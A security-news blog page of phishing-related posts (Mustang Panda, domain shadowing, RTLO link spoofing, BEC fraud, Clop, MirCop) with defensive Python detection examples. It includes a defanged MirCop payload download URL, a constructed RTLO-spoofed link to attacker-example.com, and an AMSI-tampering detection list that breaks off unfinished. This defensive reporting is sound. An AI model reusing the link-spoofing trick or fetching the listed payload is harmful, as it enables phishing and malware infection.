Showing posts with label Phishing Attack.

Mustang Panda: Chinese Threat Actor Targets Governments Worldwide


The advanced persistent threat actor Mustang Panda has been linked to a spear-phishing campaign targeting government, academic and research organizations around the world.

According to Trend Micro's report, the primary targets of the campaign between May and October 2022 were entities in Asia-Pacific countries including Myanmar, Australia, the Philippines, Japan, and Taiwan.

Mustang Panda, also tracked as Bronze President, Earth Preta, HoneyMyte, and Red Lich, is a China-based espionage actor. The group is said to have been active since July 2018 and is known for using malware such as China Chopper and PlugX to steal data.

Attributes of the Phishing Attack 

The attacks begin with spear-phishing emails and messages sent from fake Google accounts. The emails lure targets into downloading custom malware through Google Drive links.

During the investigation, researchers found that Mustang Panda used lures built around geopolitical subjects, with around 84% of the attacks aimed at government and legal organizations.

The embedded link typically pointed to a Google Drive or Dropbox folder, which looks unremarkable to the recipient. From there the victim downloads a RAR, ZIP, or JAR archive containing malware such as ToneShell, ToneIns, or Pubload.

"Earth Preta abused fake Google accounts to distribute the malware via spear-phishing emails, initially stored in an archive file (such as RAR/ZIP/JAR) and distributed through Google Drive links," says researchers Nick Dai, Vickie Su, and Sunny Lu. 

Although the group used a variety of malware-loading methods, most relied on DLL side-loading: the archive contains a legitimate executable which, once run by the target, loads a malicious DLL placed alongside it.
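As an added illustration of the archive layout that side-loading relies on (example code written for this page, not Trend Micro's or Mustang Panda's tooling), the Python below opens a ZIP or JAR archive, classifies each member by its PE header rather than its file extension, and reports every executable that ships with a DLL in the same directory. The archive contents, the file names Agenda.exe and libcurl.dll, and the minimal PE stubs are constructed for the example; a real triage script would add signature checks on the EXE and import-table inspection of the DLL.

```python
import io
import struct
import zipfile
from collections import defaultdict
from posixpath import dirname

IMAGE_FILE_DLL = 0x2000  # COFF Characteristics flag set on DLL images


def pe_kind(data: bytes):
    """Classify a file as 'exe' or 'dll' from its PE header, not its extension.

    Returns None for anything that is not a PE image (text, images, nested archives).
    """
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    # The 20-byte COFF header follows the signature; Characteristics is its last field (offset 18).
    characteristics = struct.unpack_from("<H", data, e_lfanew + 4 + 18)[0]
    return "dll" if characteristics & IMAGE_FILE_DLL else "exe"


def find_sideload_candidates(zip_bytes: bytes) -> dict:
    """Map every EXE in the archive to the DLLs that sit in the same directory.

    A lure archive that unpacks an EXE next to a DLL it will load from its own
    folder is the layout DLL side-loading depends on; an EXE with no neighbouring
    DLL is not reported. JAR files are ZIP-format and can be passed in unchanged.
    """
    by_dir = defaultdict(lambda: {"exe": [], "dll": []})
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as archive:
        for info in archive.infolist():
            if info.is_dir():
                continue
            kind = pe_kind(archive.read(info))
            if kind:
                by_dir[dirname(info.filename)][kind].append(info.filename)
    return {
        exe: sorted(group["dll"])
        for group in by_dir.values()
        for exe in group["exe"]
        if group["dll"]
    }


# --- constructed sample data; not a real Mustang Panda archive ---

def make_pe(is_dll: bool) -> bytes:
    """Build the smallest byte string pe_kind() accepts: a DOS stub pointing at a COFF header."""
    e_lfanew = 0x40
    dos = bytearray(e_lfanew)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    characteristics = IMAGE_FILE_DLL if is_dll else 0x0002  # 0x0002 = IMAGE_FILE_EXECUTABLE_IMAGE
    coff = struct.pack("<HHIIIHH", 0x8664, 1, 0, 0, 0, 0, characteristics)
    return bytes(dos) + b"PE\0\0" + coff


def build_sample_archive() -> bytes:
    """Archive shaped like a lure: decoy text, an EXE with a DLL beside it, and an
    unrelated DLL in another folder that must not be paired with the EXE."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as archive:
        archive.writestr("Agenda/README.txt", "Meeting agenda attached.")
        archive.writestr("Agenda/Agenda.exe", make_pe(is_dll=False))   # hypothetical names
        archive.writestr("Agenda/libcurl.dll", make_pe(is_dll=True))
        archive.writestr("Tools/helper.dll", make_pe(is_dll=True))
    return buf.getvalue()


SAMPLE_ARCHIVE = build_sample_archive()

if __name__ == "__main__":
    for exe, dlls in find_sideload_candidates(SAMPLE_ARCHIVE).items():
        print(f"side-loading candidate: {exe} loads from {', '.join(dlls)}")
```

Classifying by header matters because lure archives often disguise executables with document-like names; the extension tells you nothing, the MZ/PE signature does. RAR archives need a third-party library such as rarfile, but the grouping logic is identical.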

“In addition, the actors leverage different techniques for evading detection and analysis, like code obfuscation and custom exception handlers. We also found that the senders of the spear-phishing emails and the owners of Google Drive links are the same. Based on the sample documents that were used for luring the victims, we also believe that the attackers were able to conduct research and, potentially, prior breaches on the target organizations that allowed for familiarity, as indicated in the abbreviation of names from previously compromised accounts,” explained Trend Micro researchers.  "Once the group has infiltrated a targeted victim's systems, the sensitive documents stolen can be abused as the entry vectors for the next wave of intrusions. This strategy largely broadens the affected scope in the region involved."    

Palo Alto Networks: Domain Shadowing is a Prevalent Threat

 

According to Unit 42, the threat research arm of Palo Alto Networks, a phishing technique known as domain shadowing is far more widespread than previously assumed. Its detector identified 12,197 shadowed domains serving malicious content between April 25 and June 27, 2022.
 
Attackers use domain shadowing to operate quietly. Once a threat actor gains control of a domain's DNS, for example by compromising the owner's registrar or DNS-provider account, they create their own subdomains under the legitimate, reputable domain and point them at infrastructure they control. The shadow domains are then used in several ways, such as slipping past reputation-based security checks, distributing malware and committing fraud.
 
Notably, the attackers add these shadow domains without altering the existing records or the functioning of the original domain. That is what keeps them hidden: visitors notice nothing wrong, and domain owners rarely audit their DNS zones for records they did not create.
 
Unit 42 does, however, describe a method for detecting hijacked domains and rogue subdomains. It works through a checklist: whether the IP address of the subdomain differs from that of the parent domain, how long the parent domain and the subdomain have each been active, and whether the subdomain names follow patterns typical of automated generation.
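The three checks above can be combined into a simple scoring routine. The Python below is an added example, not Unit 42's detector; the passive-DNS-style records, the domain example-school.org, the observation date and the scoring weights are all constructed for illustration.

```python
from dataclasses import dataclass, field
from datetime import date
from ipaddress import ip_address
from typing import List, Optional


@dataclass
class DnsRecord:
    name: str         # fully qualified domain name
    ip: str           # address from the A record
    first_seen: date  # first observation in passive DNS (constructed here)


@dataclass
class Finding:
    name: str
    score: int = 0
    reasons: List[str] = field(default_factory=list)


def looks_random(label: str) -> bool:
    """Name-pattern check: long labels mixing digits and letters, or long labels
    with almost no vowels, rarely name a real service (www, mail, vpn, login...)."""
    s = label.replace("-", "").lower()
    if len(s) < 8:
        return False
    has_digit = any(c.isdigit() for c in s)
    has_alpha = any(c.isalpha() for c in s)
    vowel_ratio = sum(c in "aeiou" for c in s) / len(s)
    return (has_digit and has_alpha) or vowel_ratio < 0.2


def score_subdomain(apex: DnsRecord, sub: DnsRecord, observed: date,
                    threshold: int = 3) -> Optional[Finding]:
    """Apply the three checks to one subdomain; return a Finding if the score reaches the threshold.
    Weights: different IP = 1, recently created under an old apex = 2, generated-looking label = 2,
    so a differing IP alone (a legitimate mail host, say) never trips the alarm."""
    finding = Finding(sub.name)
    if ip_address(sub.ip) != ip_address(apex.ip):
        finding.score += 1
        finding.reasons.append(f"resolves to {sub.ip} while the apex resolves to {apex.ip}")
    apex_age = (observed - apex.first_seen).days
    sub_age = (observed - sub.first_seen).days
    if apex_age > 365 and sub_age <= 30:
        finding.score += 2
        finding.reasons.append(f"first seen {sub_age} days ago under an apex that is {apex_age} days old")
    label = sub.name[: -(len(apex.name) + 1)]  # strip ".<apex>" to get the subdomain label
    if looks_random(label):
        finding.score += 2
        finding.reasons.append(f"label '{label}' looks machine-generated")
    return finding if finding.score >= threshold else None


def flag_shadowed(apex: DnsRecord, subdomains: List[DnsRecord], observed: date) -> List[Finding]:
    return [f for f in (score_subdomain(apex, s, observed) for s in subdomains) if f is not None]


# --- constructed sample data (TEST-NET addresses, fictional domain) ---
OBSERVED = date(2022, 6, 27)
APEX = DnsRecord("example-school.org", "198.51.100.20", date(2015, 3, 1))
SUBDOMAINS = [
    DnsRecord("www.example-school.org", "198.51.100.20", date(2015, 3, 1)),          # legitimate
    DnsRecord("mail.example-school.org", "198.51.100.25", date(2016, 1, 10)),        # legitimate, other host
    DnsRecord("kz7q2x9h4f.example-school.org", "203.0.113.77", date(2022, 6, 20)),   # shadow domain
    DnsRecord("login-secure.example-school.org", "203.0.113.77", date(2022, 6, 21)), # shadow domain
]

if __name__ == "__main__":
    for finding in flag_shadowed(APEX, SUBDOMAINS, OBSERVED):
        print(f"{finding.name} (score {finding.score}): " + "; ".join(finding.reasons))
```

The mail host shows how the weights avoid a common false positive: a subdomain on a different IP that has existed for years scores only 1. The two shadow domains score 5 and 3 respectively, the second purely on timing plus IP, which is why age data from passive DNS is the most valuable input here.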
 
Domain shadowing can be seen as an evolution of older DNS-abuse techniques such as fast flux, and it is among the hardest to detect: the attacker can add tens of thousands of subdomains across hijacked domains and rotate between them, so blocking one subdomain reveals little about where the next one will appear.
 
When Palo Alto Networks' researchers reviewed the 12,197 shadowed domains they had identified, only about 200 had been flagged as malicious by security vendors on VirusTotal. VirusTotal data also showed that some of them belonged to a single phishing campaign that used 649 shadowed subdomains across 16 compromised domains.
 
The shadowed domains in that campaign hosted phishing pages built to steal users' login credentials. To protect your domain and your users, secure registrar and DNS-provider accounts with strong authentication, audit your DNS zones for records you did not create, feed subdomain intelligence into your detection platforms, and check a page's address carefully before entering credentials.

T-Mobile Users Targeted via New Smishing Campaign

 

Threat actors are targeting T-Mobile customers in an ongoing smishing campaign with malicious links using unblockable texts sent via SMS (Short Message Service) group messages. The New Jersey Cybersecurity & Communications Integration Cell (NJCCIC) issued a warning after multiple users have filed reports of being targeted by this new SMS phishing campaign. 

"The messages vary but typically thank the recipient for paying their bill and offer a gift. The messages include a link to accept the gift," according to the NJCCIC, which operates within the state's Office of Homeland Security and Preparedness and deals with these types of incidents. “These links may lead to malicious websites intending to steal account credentials or personal information, or install malware."

Earlier in the year, in March, a similar series of smishing attacks targeted Verizon Wireless and Spectrum users, with text messages spoofed to appear as if they came from the target's own phone number.

The Federal Trade Commission also issued a warning to T-Mobile users to watch out for fraudsters sending them texts from their numbers. "They’ve changed (spoofed) the caller ID to look like they’re messaging you from your number, but the shock of getting a text from yourself is bound to get your attention — which is what they’re after," the FTC said. 

Cybercriminals using information from previous data breaches

The NJCCIC believes the smishing campaign was likely made possible by earlier data breaches affecting the carrier and millions of its customers.

Since 2018, when hackers stole information belonging to roughly 3% of T-Mobile's customers, the carrier has disclosed five further data breaches. In 2020, T-Mobile employee email accounts were compromised, and customer phone numbers and call records were accessed by unauthorized third parties.

The NJCCIC advises T-Mobile users who receive such messages to navigate directly to official websites rather than clicking links in SMS messages from unknown senders, and to refrain from entering sensitive details on unverified websites.

It also recommends muting the group text thread to stop notifications when other recipients reply. Users can delete the thread as well, although that will not stop new texts from arriving.

For Three Years, Leading Messaging Apps Were Spoofed Using a URL Rendering Trick

 

A URL rendering issue has been identified as the basis of phishing attacks against several popular messaging and email apps, including WhatsApp, Instagram, iMessage, Facebook Messenger, and Signal. For around three years it allowed attackers to craft messages containing links that looked legitimate but led elsewhere.

The finding is a timely one. The researchers explain that the rendering issue arises when a right-to-left override (RTLO) character is injected into a URL: the application lays the text out in a misleading order, so the URL displayed is not the URL that opens.

RTLO is one of the Unicode bidirectional control characters, and its presence in a string makes any client that renders it naively vulnerable to URI spoofing. When an RTLO character is inserted, the text following it is displayed right-to-left instead of left-to-right in a browser or messaging app. Legitimately, the character is used to display right-to-left scripts such as Arabic and Hebrew.

Ordinary users are the prime targets, the end goal being phishing by spoofing well-known domains. Several of these flaws received CVE identifiers covering a wide range of messaging app versions:

  • CVE-2020-20093 — Facebook Messenger 227.0 or earlier on iOS and 228.1.0.10.116 or earlier on Android
  • CVE-2020-20094 — Instagram 106.0 or earlier on iOS and 107.0.0.11 or earlier on Android
  • CVE-2020-20095 — iMessage on iOS 14.3 or earlier
  • CVE-2020-20096 — WhatsApp 2.19.80 or earlier on iOS and 2.19.222 or earlier on Android

Signal has no CVE because the attack method was disclosed directly to its developers.
The CVE IDs carry a 2020 year because the vulnerabilities were first reported in August 2019 by a researcher known as 'zadewg'.

The trick concatenates two URLs so that they are displayed as one, even though the application treats them as two separate links. Clicking the left-hand part takes the user to one site, while clicking the right-hand part takes them to another.

According to the research, the rendering problem is far less effective on email services such as Outlook.com, ProtonMail, or Gmail, but further attacks on other messaging and email apps are to be expected.

The one-line proof of concept is freely available and simple to use, even for people with no technical background. Beyond the proof of concept, there is ample evidence of RTLO abuse in the wild.

Several other messaging and email apps are likely vulnerable to the same trick, but only those listed above have been confirmed. Users of the listed apps should be careful with messages containing URLs: treat a link that appears to contain two addresses as suspicious, check the destination before opening it, and install app security updates that may fix the problem.
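The Python below is an added example (not zadewg's proof of concept and not code from any of the affected apps) showing why the displayed URL and the real URL diverge, and how a message gateway or client can catch such links before a user sees them. The sample message and the domain attacker-example.com are constructed; approximate_render is a deliberate simplification of Unicode bidi layout (UAX #9), just enough to make the effect visible.

```python
import re
import unicodedata

# Unicode bidirectional control characters that change how a string is laid out.
BIDI_CONTROLS = {
    0x061C,                                  # ARABIC LETTER MARK
    0x200E, 0x200F,                          # LRM, RLM
    0x202A, 0x202B, 0x202C, 0x202D, 0x202E,  # LRE, RLE, PDF, LRO, RLO
    0x2066, 0x2067, 0x2068, 0x2069,          # LRI, RLI, FSI, PDI
}
RLO, PDF = "\u202e", "\u202c"
URL_RE = re.compile(r"https?://\S+")


def find_bidi_controls(text: str):
    """Return (index, code point, name) for every bidi control character in text."""
    return [(i, f"U+{ord(c):04X}", unicodedata.name(c))
            for i, c in enumerate(text) if ord(c) in BIDI_CONTROLS]


def escape_bidi(text: str) -> str:
    """Make the controls visible, e.g. in a log line or a rendered preview."""
    return "".join(f"\\u{ord(c):04X}" if ord(c) in BIDI_CONTROLS else c for c in text)


def approximate_render(text: str) -> str:
    """Rough model of what a naive UI shows: everything after an RLO is drawn
    reversed until a PDF (or the end of the text). Real bidi layout is more
    involved; this is enough to show why the shown and logical URLs differ."""
    out, i = [], 0
    while i < len(text):
        if text[i] == RLO:
            end = text.find(PDF, i + 1)
            end = len(text) if end == -1 else end
            out.append(text[i + 1:end][::-1])
            i = end + 1
        else:
            out.append(text[i])
            i += 1
    return "".join(out)


def suspicious_urls(message: str):
    """Every URL in the message that carries a bidi control, with an escaped form for logging."""
    return [(u, escape_bidi(u)) for u in URL_RE.findall(message) if find_bidi_controls(u)]


# Constructed sample: the logical URL points at attacker-example.com; the RLO makes the
# trailing path render as "https://drive.google.com", so the user sees two addresses joined.
SPOOFED_URL = "https://attacker-example.com/\u202emoc.elgoog.evird//:sptth"
SAMPLE_MESSAGE = f"Agenda for tomorrow: {SPOOFED_URL} (please confirm by noon)"

if __name__ == "__main__":
    print("logical :", escape_bidi(SPOOFED_URL))
    print("rendered:", approximate_render(SPOOFED_URL))
    for url, escaped in suspicious_urls(SAMPLE_MESSAGE):
        print("flagged :", escaped, find_bidi_controls(url))
```

The defensive rule is simple: a URL has no legitimate reason to contain bidi controls, so reject or rewrite any link in which find_bidi_controls returns anything, and render the escaped form rather than the raw string.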

Baltimore City was Duped Out of $376K

 

A new report from the Office of the Inspector General (OIG) reveals that a cyber-criminal posing as a vendor duped Baltimore city out of hundreds of thousands of dollars last year. In October 2021, the OIG opened an investigation after receiving information from Baltimore's Bureau of Accounting and Payroll Services (BAPS) about an allegedly fraudulent Electronic Funds Transfer (EFT). The Mayor's Office of Children and Family Success (MOCFS) had been paying the vendor by EFT.

BAPS and MOCFS were contacted by email on December 22, 2020 and January 7, 2021 from an email address associated with an employee of the vendor, requesting a change to its EFT remittance details. On December 16, 2020, the same address had sent BAPS a Vendor Payment & Electronic Funds Transfer Form.

The OIG later determined that the vendor employee's email account had been compromised through a phishing attack, and that the malicious actor had set up rules within the account. Those rules allowed the actor to correspond with City workers without the vendor's knowledge.
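Mailbox rules planted after a takeover are one of the few durable artefacts of a business email compromise, and they tend to share a recognisable shape: hide incoming mail about invoices or payments, or forward it outside the organization, and give the rule an unremarkable name. The Python below is an added example, not anything from the OIG report or Exchange itself; the rule records, the vendor domain vendor-example.com and the external address are constructed, with field names modelled loosely on Exchange inbox rules.

```python
import re

# Keywords a BEC actor filters on to intercept payment conversations.
FINANCE_KEYWORDS = re.compile(r"\b(invoice|payment|remit|remittance|wire|bank|ach|eft|account)\b", re.I)
# Folders users rarely look at, so moved mail stays unnoticed.
HIDING_FOLDERS = {"rss feeds", "rss subscriptions", "conversation history",
                  "archive", "junk email", "deleted items"}


def audit_rules(rules, org_domain: str):
    """Return the rules that show two or more BEC traits.

    Any single trait (an external forward, a keyword filter, a one-character name)
    can be legitimate; the combination is the signature of a compromised mailbox.
    """
    findings = []
    for rule in rules:
        reasons = []
        name = rule.get("name", "")
        if not name.strip(" .,-_"):
            reasons.append("rule name is blank or punctuation only")
        for addr in rule.get("forward_to", []):
            domain = addr.rpartition("@")[2].lower()
            if domain != org_domain.lower():
                reasons.append(f"forwards to external address {addr}")
        folder = rule.get("move_to_folder", "")
        if folder.lower() in HIDING_FOLDERS:
            reasons.append(f"moves matching mail to '{folder}'")
        if rule.get("delete"):
            reasons.append("deletes matching mail")
        if rule.get("mark_as_read"):
            reasons.append("marks matching mail as read")
        terms = " ".join(rule.get("subject_or_body_contains", []) + rule.get("from_contains", []))
        if FINANCE_KEYWORDS.search(terms):
            reasons.append(f"filters on finance keywords: {terms}")
        if len(reasons) >= 2:
            findings.append({"name": name or "<unnamed>", "reasons": reasons})
    return findings


# --- constructed sample: one benign rule and two typical BEC rules ---
ORG_DOMAIN = "vendor-example.com"
SAMPLE_RULES = [
    {"name": "Newsletters", "from_contains": ["news@"], "move_to_folder": "Newsletters"},
    {"name": ".", "subject_or_body_contains": ["invoice", "payment", "remittance"],
     "move_to_folder": "RSS Feeds", "mark_as_read": True},
    {"name": "Backup", "from_contains": ["cfo@vendor-example.com"],
     "forward_to": ["acct.vendor@mail-example.net"], "delete": True},
]

if __name__ == "__main__":
    for finding in audit_rules(SAMPLE_RULES, ORG_DOMAIN):
        print(f"rule {finding['name']!r}: " + "; ".join(finding["reasons"]))
```

Run against an export of all mailbox rules in the tenant, this flags the two planted rules and ignores the newsletter filter. The same checks belong in the incident-response playbook for any mailbox implicated in a payment-redirection fraud, since the attacker's rules survive a password reset.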

On January 5, 2021, the fraudster contacted MOCFS and BAPS once more, this time requesting that the funds be transferred to a new account at a third financial institution. As verification, the fraudster sent a bank letter and a copy of a voided check with the same details as the third account. BAPS paid $376,213.10 into the third account on January 7, 2021, believing the fraudster's assertions. 

The OIG found that BAPS employees have no access to a list of authorized signatories for vendors and must rely on information provided by representatives of City agencies. Rather than independently validating the request, BAPS relied on MOCFS to vouch for it and accepted an inbound phone call from someone posing as the vendor's Chief Financial Officer.

In his response to this report, Director of Finance Henry Raymond notified the OIG that new protocols had been implemented requiring Department of Finance (DOF) workers to independently verify bank changes with an executive-level employee. DOF has also devised processes to exclude City agencies from vendor accounting procedures.

The Potential Damage to Russia from Cybercrime in 2022 was Estimated at 2.2 Billion Dollars

 

RTM Group experts believe that the damage from criminal actions using computer technology in Russia this year will continue to grow and may reach 165 billion rubles. 

The growth will be facilitated by the low level of cyber-literacy of the population, as well as people's desire to save money in conditions of rising prices and uncertainty.

In 2021, the total damage from cybercrime exceeded 150 billion rubles (roughly $2 billion). In total, 518 thousand cybercrimes were committed last year, almost twice as many as in 2019.

According to Yevgeny Tsarev, manager of RTM Group, the number of successful cyber attacks in 2021 rose by about a third (+35%). In 2022 the growth will continue and reach at least 30%, driven by the development of social engineering schemes and the use of new technologies. By the end of the year the total damage may exceed 165 billion rubles (roughly $2.2 billion).

Phone calls to a potential victim have become the most common form of fraud, while malware and phishing are the most common means of stealing funds. RTM Group experts note that only a small proportion of victims go to court, since they assume the money cannot be recovered anyway.

Experts agreed that fraudsters will become even more active and the growth of cyberattacks will continue since the criminal procedure law is not currently adapted to this kind of crime. In addition, law enforcement agencies do not have enough qualified personnel to carry out investigations. 

According to experts, "people now live in a state of uncertainty of prospects on the one hand, and constantly rising prices on the other," which leads to a desire to save money. And this is abused by scammers in the mail, in social networks and by phone. 

In addition, according to Kaspersky Lab experts, ransomware operators attacked 16 thousand Russian companies in 2021, with attacks becoming less indiscriminate and more targeted. The company noted that in 2021 alone, 49 new ransomware families and more than 14 thousand variants were discovered worldwide. Before encrypting, the attackers steal company data and threaten to publish it unless they are paid.

The Clop Ransomware Gang Leaked Sensitive Data from the UK Police

 

Clop ransomware operators stole confidential information held by British police, according to media reports, after targeting the IT firm Dacoll, which had access to the Police National Computer (PNC). The reports say the attackers compromised the company's systems through a phishing attack. The Mail reported the breach on December 19, 2021; by then the gang had already published the stolen material on its dark web leak site.

Clop ransomware, a variant of the well-known CryptoMix family, is file-encrypting malware that targets poorly protected systems and encrypts stored files, appending the .Clop extension. It uses the AES cipher to encrypt images, videos, music, databases and documents and attaches the .CLOP or .CIOP extension, locking victims out of their data. For instance, "sample.jpg" is renamed "sample.jpg.Clop."

The name comes from the Russian word "klop," meaning bed bug, an insect of the genus Cimex that feeds on human blood at night. Clop is regarded as a severe threat because it runs on most Windows versions, including Windows XP, Windows 7, Windows 8, Windows 8.1, and Windows 10.

The breach occurred in October, when Clop operators obtained access to Dacoll data, including PNC data containing personal information and records on 13 million people. Confirming the breach, Dacoll said: "We can confirm we were the victims of a cyber incident on October 5."

“We were able to quickly return to our normal operational levels. The incident was limited to an internal network not linked to any of our clients’ networks or services.” 

“The cyber-criminal gang Clop has released some of the material it plundered from an IT firm that handles access to the police national computer (PNC) on the so-called ‘dark web’ – with the threat of more to follow.” reported the Daily Mail. “Clop is believed to have demanded a ransom from the company, Dacoll, after launching a ‘phishing’ attack in October." 

Dacoll declined to pay and did not disclose the size of the ransom demand. Among the stolen material are photographs of motorists taken from the National Automatic Number Plate Recognition (ANPR) system, footage, and close-up images of the faces of drivers who had committed traffic offences.

West Virginia Hospitals Suffered a Data Breach Resulting from a Phishing Attack

 

A West Virginia hospital system suffered a data breach after a phishing attack gave intruders access to multiple email accounts. Between May 10 and August 15, the attackers accessed several email accounts at Monongalia Health System (Mon Health), which operates Monongalia County General Hospital Company and Stonewall Jackson Memorial Hospital Company. The accounts held sensitive data about patients, providers, employees, and contractors.

On October 29, 2021, Mon Health completed its investigation into an email phishing incident that may have resulted in unauthorized access to emails and attachments in numerous Mon Health accounts. Mon Health first became aware of the situation on July 28, 2021, when a vendor reported that it had not received a payment. The investigation revealed that unauthorized individuals had gained access to a Mon Health contractor's email account and used it to send emails attempting to obtain funds from Mon Health through fraudulent wire transfers.

When Mon Health learned of this, it secured the contractor's email account and reset the password, alerted law enforcement, and hired a third-party forensic firm to assist with the investigation. The inquiry also found that the incident was limited to Mon Health's email system and did not touch the organization's electronic health record systems. There was no evidence that any of Mon Health's other affiliated hospitals or healthcare facilities, including Mon Health Preston Memorial Hospital and Mon Health Marion Neighborhood Hospital, were involved in or impacted by the incident, and the incident had no effect on the services or operations of Mon Health or its affiliates.

Patients who have been affected by the breach have been notified personally, and an assistance centre has been established to answer inquiries. Mon Health also stated that it is analyzing and improving its security processes and practices, including the implementation of multifactor authentication for remote access to its email system. 

“Business email compromise continues to be the silent killer for organizations and data breaches within various industries, including healthcare,” said James McQuiggan, security awareness advocate at security awareness training firm KnowBe4 Inc. “Utilizing a careful cynicism or a ‘trust and verify’ mindset, organizations can implement technology solutions and user processes to prevent these successful and effective attacks."

McQuiggan noted that, on the technical side, implementing domain and sender email address verification is a straightforward control that authenticates the sending domain and reduces the chance of an attack from a "doppelganger domain." One caveat: standards such as SPF, DKIM and DMARC authenticate mail claiming to come from your own domain; a doppelganger domain is a separate, attacker-registered domain that can pass its own checks, so lookalike-domain monitoring and displaying the full sender address to users are needed as well.
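To make the "doppelganger domain" idea concrete, the Python below is an added example (not KnowBe4's or Mon Health's tooling) that checks whether a sender's domain imitates a trusted vendor domain by homoglyph substitution, TLD swap, hyphen insertion or removal, or a single typo. The trusted domain example-vendor.com and the candidate sender addresses are constructed; the function assumes trusted domains are registrable names with a one-label TLD.

```python
# Pairs of character sequences that look alike in common fonts; the attacker's
# spelling on the left is rewritten to the canonical letter on the right.
HOMOGLYPHS = [("rn", "m"), ("vv", "w"), ("cl", "d"), ("0", "o"), ("1", "l"), ("3", "e"), ("5", "s")]


def normalize(domain: str) -> str:
    d = domain.lower().strip(".")
    for lookalike, canonical in HOMOGLYPHS:
        d = d.replace(lookalike, canonical)
    return d


def edit_distance(a: str, b: str) -> int:
    """Optimal string alignment distance: insert, delete, substitute or swap two
    adjacent characters each cost 1, so 'exampel' is one edit from 'example'."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)
    return d[len(a)][len(b)]


def lookalike_of(sender_domain: str, trusted_domains):
    """Return (trusted_domain, reason) if sender_domain imitates a trusted one, else None.

    Assumes trusted domains are registrable names with a single-label TLD (example.com,
    not example.co.uk); use a public-suffix list for anything more general.
    """
    s = sender_domain.lower().strip(".")
    if s in trusted_domains:
        return None
    s_norm = normalize(s)
    s_sld, _, s_tld = s_norm.rpartition(".")
    for trusted in trusted_domains:
        t = trusted.lower()
        t_sld, _, t_tld = t.rpartition(".")
        if s_norm == t:
            return trusted, "homoglyph substitution"
        if s_sld == t_sld and s_tld != t_tld:
            return trusted, "TLD swap"
        if s_tld == t_tld and s_sld.replace("-", "") == t_sld.replace("-", ""):
            return trusted, "hyphen added or removed"
        if s_tld == t_tld and edit_distance(s_sld, t_sld) == 1:
            return trusted, "single-edit typo"
    return None


def check_sender(address: str, trusted_domains):
    """Convenience wrapper for a From: address."""
    return lookalike_of(address.rpartition("@")[2], trusted_domains)


TRUSTED = ["example-vendor.com"]  # hypothetical vendor the organization pays

if __name__ == "__main__":
    for addr in ["ap@example-vendor.com", "ap@exarnple-vendor.com", "ap@example-vendor.co",
                 "ap@examplevendor.com", "ap@exampel-vendor.com", "ap@unrelated.net"]:
        print(f"{addr:28} -> {check_sender(addr, TRUSTED)}")
```

The single-typo rule is the noisiest of the four on short domain names, so in production it is best used to raise a warning banner rather than to quarantine, while homoglyph matches and TLD swaps against a known vendor list justify a hard block.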

Phishing Emails Deliver Scary Zombie-themed MirCop Ransomware

 

A new phishing campaign that poses as supply lists attacks users with the MirCop ransomware, which encrypts a target PC in less than fifteen minutes. 

The perpetrators start the attack by sending an unsolicited email to the victim, claiming to be following up on a previous order arrangement. The email body includes a hyperlink to a Google Drive URL that, when clicked, downloads an MHT file (webpage archive) to the victim's device. 

The use of Google Drive lends credibility to the email and matches ordinary business practice. Small choices like this decide whether the victim clicks the link or consigns the email to the spam folder. When the recipient opens the file, all they see is a blurry image of what appears to be a supplier list, stamped and signed for added legitimacy.

When the MHT file is opened, it downloads a RAR archive from hXXps://a[.]pomf[.]cat/gectpe.rar containing a .NET malware downloader. The executable in the archive uses VBS scripts to drop and run the MirCop payload on the victim's machine.

The ransomware starts capturing screenshots right away, locks files, changes the background to a terrifying zombie-themed graphic, and instructs victims on what to do next. The entire procedure, according to Cofense, takes less than 15 minutes from the time the victim opens the phishing email. 

After that, the victim is left with only a few working web browsers with which to contact the actors and arrange the ransom payment. The actors have no interest in infiltrating the victim's computer discreetly or staying there long to conduct espionage or collect files for extortion. On the contrary, the attack is fast, and its cause is obvious to the victim immediately.

About the ransomware

MicroCop is an old ransomware strain known for absurd ransom demands. It was active until Michael Gillespie broke its encryption and released a free decryptor.

As per BleepingComputer, it was not able to verify whether that old decryptor still works with the payloads delivered in the most recent campaign, but it's possible that it can still unlock the files.

According to Cofense, the identical variant has been circulating since June of this year, indicating that MicroCop is still active and that people should be wary when dealing with unwanted emails.

Research shows that 91.5% of Malware in Q2 2021 Arrived Over Encrypted Connections

 

According to WatchGuard's latest data, 91.5 percent of malware detected in Q2 2021 arrived over encrypted (HTTPS) connections. That is a sharp rise from the previous quarter, and it means any organization that does not inspect encrypted HTTPS traffic at the perimeter is missing more than nine in ten malware samples.

The study also showed worrisome increases in file-less malware threats, a substantial increase in ransomware, and a massive increase in network cyber attacks. “With much of the world still firmly operating in a mobile or hybrid workforce model, the traditional network perimeter doesn’t always factor into the cybersecurity defense equation,” said Corey Nachreiner, CSO at WatchGuard. 

AMSI.Disable.A entered WatchGuard's top malware list for the first time in Q1 and climbed further this quarter, ranking second overall by volume and first among malware delivered over encrypted connections. The family uses PowerShell tooling to exploit a range of Windows security flaws, but what makes it notable is its evasion technique.

AMSI.Disable.A includes code that disables the Antimalware Scan Interface (AMSI) in PowerShell, allowing it to bypass script-security scanning and run its payload unnoticed. In the first six months of 2021, malware detections originating from scripting engines such as PowerShell had already reached 80% of the previous year's total script-initiated attack volume, a significant increase year over year.
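Disabling AMSI from within PowerShell leaves a trace where defenders can see it: PowerShell script block logging (event ID 4104) records the script text, including the reflective access to the AmsiUtils class and its amsiInitFailed field that such bypasses rely on. The Python below is an added example, not WatchGuard's detection logic; it scans constructed 4104-style records, first undoing the string-splitting and backtick obfuscation commonly used to hide the "Amsi" keyword.

```python
import re

# Indicators of AMSI tampering from PowerShell: reflective access to the AmsiUtils
# class or its amsiInitFailed field, or to the native AmsiScanBuffer export.
AMSI_INDICATORS = [
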